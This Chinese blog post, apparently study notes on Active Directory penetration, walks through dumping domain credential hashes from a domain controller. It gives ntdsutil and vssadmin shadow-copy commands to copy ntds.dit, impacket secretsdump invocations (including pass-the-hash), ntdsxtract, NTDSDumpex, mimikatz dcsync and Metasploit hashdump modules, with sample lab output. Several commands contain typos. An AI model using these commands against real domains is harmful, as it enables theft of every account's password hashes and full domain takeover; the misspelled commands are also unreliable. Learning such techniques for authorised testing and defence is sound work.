域控制器安全

最新推荐文章于 2023-02-24 18:32:12 发布
最新推荐文章于 2023-02-24 18:32:12 发布
阅读量349 收藏 1
点赞数 1
文章标签: 安全 windows 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38675102/article/details/128545344
版权

域控制器安全

  • 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用windows本地卷影拷贝服务,就可以获得文件的副本

一、使用卷影拷贝服务提取ntds.dit

  • 在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被windwos操作系统锁定的。
1.1 通过ntdsutil.exe提取ntds.dit

​ ntdsutil.exe是一个活动目录提供管理机制的命令行工具。使用ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上,可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有windwos2003、windwos Server 2008、Windows Server 2012。

​ 1. 在域控制器的命令行环境中输入如下命令,创建一个快照。该快照包含windwos中的所有文件,且在复制文件时不会受到windwos锁定机制的限制。(运行该命令后会得到一个快照的GUID)

ntdsutil snapshot "activete instance ntds" create quit quit

​ 2.将快照加载到系统中

ntdsutil snapsshot "mount {快照GUID}" quit quit

​ 3.将ntds.dit文件从快照中复制出来

copy C:\$SNAP_2022123111_VOLUMEC$\windwos\ntds\ntds.dit c:\test\ntds.dit

​ 4.卸载快照并删除

ntdsutil snapshot "unmount {快照GUID}" "delete {快照GUID}" quit quit

​ 5.查询快照是否成功删除

ntdsutil snapshot "list all" quit quit
1.2 利用vssadmin提取ntds.dit

​ vssadmin是windows server 2008及windwos7提供的VSS管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统Provider创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(既所谓的"diff空间")的大小等。

​ 1.在域控制器cmd中输入以下命令,创建一个C盘的卷影拷贝

vssadmin create shaow /for=c:

​ 2.在创建的卷影拷贝中将ntds.dit复制出来

copy \\?\CLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit

​ 3.删除快照

vssadmin delete shadows /for=c: /quiet
1.3 impacket远程提取ntds.dit

运行以下代码远程提取ntds.dit

python3 secretsdump.py  DC.whoamianony.org/administrator:Admin12345@192.168.1.1 -outputfile output_ntds

二、导出ntds.dit中散列值

2.1 使用esedbexport恢复ntds.dit

1.导出ntds.dit

​ 进入存放ntds.dit的目录,使用esedbexport进行恢复操作。输入以下命令进行文件提取,如果提取成功,会在同一目录下生成一个 ntds.dit.export文件。

esedbexport -m tables ntds.dit

2.导出散列值

​ 接下来使用ntdsxtract,这是一个取证工具,能够为我们从NTDS.dit文件中,提取与用户对象,组对象,计算机对象的相关信息以及删除对象。

​ ntdsxtract工具中的dsusers.py可以被用来从分离出来的表中提取用户信息以及NT/LM密码hash值

python2 dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 output --syshive SYSTEM --passwordhasher --pwdformat ocl --ntoufile atout --lmoufile lmout | tee all_user.txt

​ ps:如果运行python2的时候抛出ImportError: No module named Crypto.Hash,那么运行以下命令 pip2 install pycryptodome

3.提取域内计算机信息及其他信息

运行以下命令可以导出域内所有计算机的信息,导出文件的格式为CSV

dscomputers.py ntds.dit.export/datatable.4 computer_output --csvoutfile all_computers.csv  

List of computers:
==================
Record ID:            3947
Computer name:        DC
DNS name:             DC.whoamianony.org
GUID:                 d0f32dee-98d1-4274-a516-a7c5a6d217f9
SID:                  S-1-5-21-1315137663-3706837544-1429009142-1002
OS name:              Windows Server 2012 R2 Datacenter
OS version:           6.3 (9600)
When created:         2021-02-22 08:17:48+00:00
When changed:         2022-12-17 04:24:45+00:00
Dial-In access perm:  Controlled by policy
Ancestors:
        $ROOT_OBJECT$ org whoamianony Domain Controllers DC 

Record ID:            4131
Computer name:        PC2
DNS name:             PC2.whoamianony.org
GUID:                 d74d8105-4059-42b5-a680-46cea22f429c
SID:                  S-1-5-21-1315137663-3706837544-1429009142-1113
OS name:              Windows 7 专业版
OS version:           6.1 (7601)
When created:         2021-02-22 09:28:58+00:00
When changed:         2022-12-17 04:24:45+00:00
Dial-In access perm:  Controlled by policy
Ancestors:
        $ROOT_OBJECT$ org whoamianony Computers PC2
2.2 使用impacket工具包导出散列值

使用impacket工具包中的secretsdump,也可以解析ntds.dit文件,导出散列值。(这里将 ntds.dit.export 和 SYSTEM 文件放入到 impacket 工具的文件夹中)

1.本地导出散列值:

​ 输入以下命令导出散列值

impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL

2.通过用户名和散列值进行验证,从远程域控制器中读取ntds.dit并转储域散列值

impacket-secretsdump -hashes <hashdump值> -just-dc DC.com/Administrator@192.168.1.1
2.3 在windows下解析ntds.dit并导出域账号和域散列值

使用NTDSDumpex.exe可以进行导出散列值的操作。

将ntds.dit、SYSTEM和NTDSDumpex.exe放在同一目录下,打开cmd,输入以下命令导出域账号和域散列值

NTDSDumpex.exe -d ntds.dit -s system

三、利用dscync获取域散列值

3.1 使用mimikatz转储域散列值

​ mimikatz有一个dscync功能,可以利用卷影拷贝服务直接读取ntds.dit文件并检索域散列值。但是条件是必须是域管理员权限运行mimikatz才可以读取到ntds.dit.

​ 在域内的任意一台计算机中,以域管理员权限打开cmd,运行mimikatz。输入以下命令使用mimikatz导出域内所有的用户名及散列值。

ladump::dcsync /doamin:doc.com/all /csv

​ 使用mimikatz的dcsync功能也可以导出指定用户的散列值。可以直接导出域用sa的散列值

lsadump::dcsync /domain:doc.com /user:sa

四、使用Metasploit获取域散列值

4.1 psexec_ntdsgrad模块的使用

​ 在kali linux中进入Metasploit环境,输入以下命令,使用psexec_ntdsgrad模块

use auxliiary/admin/smb/psexec_ntdsgrab

​ 输入 show options 查看需要配置的参数,需要配置的参数有RHOST、SMBDomain、SMBuser、SMBPass。

​ 配置好后,输入 run 命令并执行(该脚本使用卷影拷贝服务),将ntds.dit文件和SYSTEM项复制并传送到Kali Linux机器的 /root/.msf4/loot 文件夹下。

​ 接下来,就可以使用impacket工具包等解析ntds.dit文件,导出域账号和域散列值。

4.2 基于meterpreter会话获取域账号和域散列值

​ 1.在使用msf得到了meterpreter会话后,在meterpreter里输入"background"返回到msfconsole界面,输入“sessions"查看meterpreter的会话编号,这里假设编号为1。

​ 2.进入"/windwos/gather/credntials/domain_hashdump",输入meterpreter的会话编号“set session1”,然后输入“run”执行该exp

​ 3.这样ntds.dit就被解析了,域账号和域散列值被导出了。

Lend me
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
确保AD域控安全应对网络高级威胁攻击.pdf
08-06
AD是网络基础设施的核心单元 AD域控广泛被攻击的根本原因 现代安全攻杀链框架 Active Directory安全遇到的问题 Tenable.ad定位于现代威胁生态系统
第6章域控制器安全
nigo134的博客
05-31 451
使用卷影拷贝服务提取ntds.dit 方法: 通过ntdsutil.exe提取ntds.dit 利用 vssadmin提取 ntds.dit 利用vssown.vbs脚本提取ntds.dit 使用ntdsutil的iFM创建卷影拷贝 使用diskshadow导出ntds.dit 通过ntdsutil.exe提取ntds.dit 在通常情况下,即使拥有管理员权限,也无法读取域控制器中的ndts.dit文件, 但是我们又非常想获得这个文件的内容,这个时候就需要使用windows本地卷影拷贝服务VS
详细解析关于域控制器安全保障
weixin_33781606的博客
05-11 525
2019独角兽企业重金招聘Python工程师标准>>> ...
Win 2003域控制器安全
weixin_34402090的博客
08-30 125
域控制器,正如其名,它具有对整个Windows域以及域中的所有计算机的管理权限。因此你必须花费更多的精力来确保域控制器安全,并保持其安全性。本文将带您了解一些在域控制器上应该部署的安全措施。  域控制器的物理安全  第一步(也是常常被忽视的一步)就是要保障你的域控制器的物理安全。也就是说,你应该将服务器放在一间带锁的房间,并且严格的审核和记录该房间的访问情况。不要有“隐蔽起...
关于域控制器安全概述
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-30 6547
一、前言 在企业网络信息化建设中,经常会使用AD域(Active Directory Domain)来统一管理网络中的PC终端。在AD域中,DC(域控制器)中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。因此,攻击者在对AD域进行攻击时,通常以获取DC的控制权限为目标。 攻击者如果利用漏洞或者社工等方法获取了外网系统的控制权限,找到了和内网联通的通道,再进一步进行深入渗透,便形成了纵向渗透的通道。然后,攻击者通过mimikazt等工具利用票据传递等攻击手段,实现域控服务器的权限控制,从
APTIV 域控制器白皮书.pdf
06-29
自动驾驶,域控制器白皮书
域控制器实验报告
03-31
由于Windows Server 2003在默认的安装过程中DNS是不被安装的,所以我们需要手动去添加,添加方法如下:“开始—设置—控制面板—添加删除程序”,然后再点击“添加/删除Windows组件”,则可以看到如下画面:
高级别自动驾驶域控制器硬件通用设计规范-2023版本
最新发布
04-08
对高级别自动驾驶对域控制器硬件在功能、标准法规要求、功能安全设计等级、信息安全以及有关域控制器试验标准等需求内容做了详细的讨论和阐述。硬件设计上,给出了电源单元、通信单元、存储单元、计算单元、散热单元...
汽车“域”概念之车身域控制器.pdf
07-22
汽车“域”概念之车身域控制器
域控制器、活动目录的创建与管理
03-09
1.Windows Server 2003中的活动目录创建。 2.Windows Server 2003中的域控制器与域用户管理。 3.组策略应用。 4.域安全策略与域控制器安全策略。
内网渗透测试第六章——域控制器安全
山己见的博客
09-09 585
域控制器安全 在通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:Windows\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务,就可以获得文件的副本。 使用卷影拷贝服务提取ntds.dit 使用ntdsutil提取 ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe
Microsoft域控安全解决方案
软件开发大神
01-14 3811
Active Directory使用了一种结构化的数据存储方式,并以此作为基础对目录信息进行合乎逻辑的分层组织。从信息技术部门人员来说,如何整合现有IT环境中的资源,将IT环境的管理由松散方式变为集中管理的方式,减轻日常管理维护负担,提升IT生产力。从最终用户来说,如何能够实现单一的身份验证,快速的访问企业内部的各种资源,较少的宕机时间也是最大的愿望。域控安全作用:1、集中的组织与管理网络内的服务器及客户端2、统一的数据组织与资源管理3、单一登录的网络环境4、集中化的软件部署与运行限制5、功能强大并易于扩展
我的域控是不是被攻击了?吓!
荒野求生的博客
04-07 638
我的域控是不是被攻击了?吓! https://mp.weixin.qq.com/s/HU7Kpb9gTFkeCZWo-D5UsQ 大家好,我是一只鱼,一只朴实无华且枯燥的做IT运维鱼,我会在这里分享平时工作上的一些朴实无华且枯燥的那点事儿~ 话说某天本鱼正在快快乐乐的摸鱼划水勤劳搬砖的时候感觉有人在盯着我看,一抬头就看到了美丽的前台小姐姐晓彤站在我旁边,于是我心想莫非是小姐姐看上我要跟我表白了? 小姐姐说:我,账号锁了。你,解锁! ...
Windows 域基础
03-13 665
Windows域基础 工作组与域 无论是域还是工作组,其目的均是对计算机网络进行管理,实现更清晰的组织架构以及较未便利的资源管理。工作组适用于企业网络较小的情况中,计算机接入网络后,均默认处于WORKGROUP的工作组中,打开网络邻居会显示所有接入网络的计算机,可以加入不同的组使得看起来网络结构较未清晰,工作组是一群计算机的合集,它仅仅是一个逻辑的集合,每台计算机之间的关系的对等的,不存在谁管理谁的关系,各自为政,同时每台计算机可以自主的加入和推出相关的工作组,不受约束。域是一个有安全边界的计算机集合,域
域控制器DSRM账户安全防护
weixin_41082546的博客
05-05 1291
一、DSRM简介    1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码...
内网渗透(五十六)之域控安全和跨域攻击-非约束委派攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-24 744
从使用的角度:用户张三访问一台机器A,于是向DC发起认证,DC会检查A的机器账号的属性,如果是非约束委派的话,会把用户的TGT放在ST票据中并一起发送给A,这样A在验证ST票据的同时也获取到了用户的TGT,并把TGT储存在自己的lsass进程中以备下次重用,从而A就可以使用这个TGT,来模拟这个张三访问任何服务。3、这个时候如果域管访问了WIN-10机器,我们的内存中就会有域管的TGT,就可以访问任意机器了,在域控上执行访问WIN-10(模仿域管访问了配置了非约束性委派的主机)获取域内用户的hash。
网络安全-域服务器(一)
IT之一小佬的博客
05-21 2216
域 1.Domain 2.内网环境 1)工作组:默认模式,人人平等,不方便管理 2)域:人人不平等,集中管理,统一管理 3.域的特点 集中/统一管理 【域里面的所有电脑已经不再平等,分等级】 4.域的组成 1)域控制器 :DC(Domain Controller) 2)成员机 5.域的部署 1)安装域控制器--就生成了域环境 2)安装了活动目录--就生成了域控制器 3)活动目录:Active Directory = AD 6.活动目录 1)AD 2)特点:集中管理/统..
“域安全策略”和“域控制器安全策略”的作用范围
weixin_33744141的博客
04-21 652
“域安全策略”和“域控制器安全策略”的作用范围,以及他们作用的先后顺序。 当一台计算机处于域模式,就会采用域策略。域对于独立的计算机而言,就是计算机本身。域策略属于计算机策略。 计算机的策略大体上分为四类,他们分别是本地策略,域策略,站点策略以及ou策略。起作用的先后顺序为local policy(本地)——〉site policy(站点)——〉domain policy...
安全策略和域控制器安全策略的区别
xiunai78的专栏
07-16 2767
安全策略和域控制器安全策略的区别 本文网址:http://bbs.bitscn.com/60806 复制 策略大体上分为4类,即本地策略,域策略,站点策略,ou策略,他们的作用顺序:local policy——〉site policy——〉domain policy——〉ou policy 本地安全策略是本地策略的一部分,在开机的时后就会被执行,无论你是否处于工作组模式
windows域控制器
07-14
Windows域控制器(Domain Controller)是在Windows Server操作系统上运行的服务器角色,用于管理和控制Windows域中的用户、计算机和其他网络资源。域控制器提供了以下主要功能: 1. 认证和授权:域控制器负责验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值